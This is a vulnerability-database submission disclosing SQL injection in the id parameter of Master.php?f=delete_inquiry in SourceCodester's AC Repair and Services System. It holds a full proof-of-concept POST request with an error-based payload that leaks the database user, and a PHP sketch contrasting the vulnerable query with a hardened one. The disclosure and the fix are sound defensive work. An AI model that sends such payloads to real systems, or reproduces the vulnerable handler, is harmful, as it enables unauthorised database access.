Submission #182578: SourceCodester AC Repair and Services System sql injection in Master.php Info

Title: SourceCodester AC Repair and Services System sql injection in Master.php
Description: I found a SQL injection vulnerability in the SourceCodester AC Repair and Services System (https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html). This affects the file /classes/Master.php?f=delete_inquiry:

POST /php-acrss/classes/Master.php?f=delete_inquiry HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2854294418240524322736048278
Content-Length: 913
Origin: http://localhost
Connection: close
Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking
Cookie: PHPSESSID=avms7d982mr3recfih6r7sfun0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="id"

1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="fullname"

111
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="contact"

111
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="address"

111
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="services[]"

1
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="status"

0
-----------------------------2854294418240524322736048278--

And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}".

This return value undoubtedly proves the existence of a SQL injection vulnerability here. The vulnerability arises from the usage of the code "sql = "UPDATE inquiry_list set {data} where id = '{$id}' ";" without implementing adequate filtering on the controllable parameter id. This absence of proper filtering exposes the possibility of SQL injection attacks. To address this issue, my recommendation is to safeguard the id parameter against malicious exploitation by utilizing mysqli_real_escape_string().
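The query pattern quoted in the submission beside a hardened handler, as an added illustration that is not code from the AC Repair and Services System; the function names, the `$conn` mysqli handle, the `delete_flag` column standing in for `{data}`, and the response shape are assumptions.

```php
<?php
// Added illustration, not the project's own code. $conn is assumed to be an
// open mysqli connection; the table name and the shape of the UPDATE follow
// the query quoted in the submission, the column "delete_flag" is assumed.

// Pattern described in the report: the id parameter is interpolated straight
// into the SQL string, and the raw database error is returned to the client,
// which is what makes the error text in the submission visible.
function delete_inquiry_vulnerable(mysqli $conn, array $post): array {
    $id   = $post['id'];
    $data = "delete_flag = 1";
    $sql  = "UPDATE inquiry_list set {$data} where id = '{$id}' ";
    if ($conn->query($sql) === false) {
        return ['status' => 'failed', 'error' => $conn->error];
    }
    return ['status' => 'success'];
}

// Hardened version: id must be a positive integer, it is bound as a typed
// parameter instead of being spliced into the query, and database error
// text is logged server-side rather than echoed in the JSON response.
function delete_inquiry_hardened(mysqli $conn, array $post): array {
    $id = filter_var($post['id'] ?? '', FILTER_VALIDATE_INT);
    if ($id === false || $id < 1) {
        return ['status' => 'failed', 'error' => 'invalid id'];
    }
    $stmt = $conn->prepare("UPDATE inquiry_list SET delete_flag = 1 WHERE id = ?");
    if ($stmt === false) {
        error_log('delete_inquiry prepare failed: ' . $conn->error);
        return ['status' => 'failed', 'error' => 'internal error'];
    }
    $stmt->bind_param('i', $id);
    $ok       = $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    if (!$ok) {
        error_log('delete_inquiry execute failed: ' . $conn->error);
        return ['status' => 'failed', 'error' => 'internal error'];
    }
    return ['status' => $affected > 0 ? 'success' : 'failed'];
}
```

The submission recommends mysqli_real_escape_string(); because id is numeric, validating it as an integer and binding it as a parameter removes the quoting question entirely, which is why the hardened handler does that instead.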
Source: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
User: L2ncE (UID 50751)
Submitted: 2023-07-14 05:29 AM (3 years ago)
Moderated: 2023-07-15 09:29 AM (1 day later)
Status: Accepted
VulDB Entry: 234223 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_inquiry id SQL injection]
Points: 20